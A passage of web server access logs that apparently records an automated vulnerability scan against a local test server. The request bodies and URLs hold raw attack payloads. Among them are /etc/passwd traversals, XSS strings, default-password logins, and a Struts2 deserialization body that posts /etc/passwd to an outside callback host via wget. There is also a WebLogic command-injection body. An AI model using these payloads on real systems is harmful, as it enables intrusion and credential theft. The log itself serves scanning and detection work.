10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/page/login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendarix/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"j_username=admin&j_password=security&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/75 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A ca2tuc8smpv1g2s80ca04soujectkkbfk.oast.pro\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /struts2-rest-showcase/orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/admin/system.users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-generated.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/script/common.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"ip=ca2tuc8smpv1g2s80ca0pcifpi6z9s3p8.oast.pro:80&argu=/","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/query.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar/admin/cal_login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"j_username=system&j_password=password&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/76 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /old_phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A wget\x0D\x0A --post-file\x0D\x0A /etc/passwd\x0D\x0A ca2tuc8smpv1g2s80ca0fdzkc39qzjtof.oast.pro\x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A java.lang.ProcessBuilder\x0D\x0A start\x0D\x0A \x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A asdasd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A false\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 0\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /orders/3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"lang=en_US&cat_id=6\x22>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?ajax-request=jnews HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"zerodiumvar_dump(233*233);", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/77 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infos.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ProtectManager/Logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /bin/bash\x0D\x0A \x0D\x0A \x0D\x0A -c\x0D\x0A \x0D\x0A \x0D\x0A nslookup ca2tuc8smpv1g2s80ca0gb33toby3h3pq.oast.pro\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-daily.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 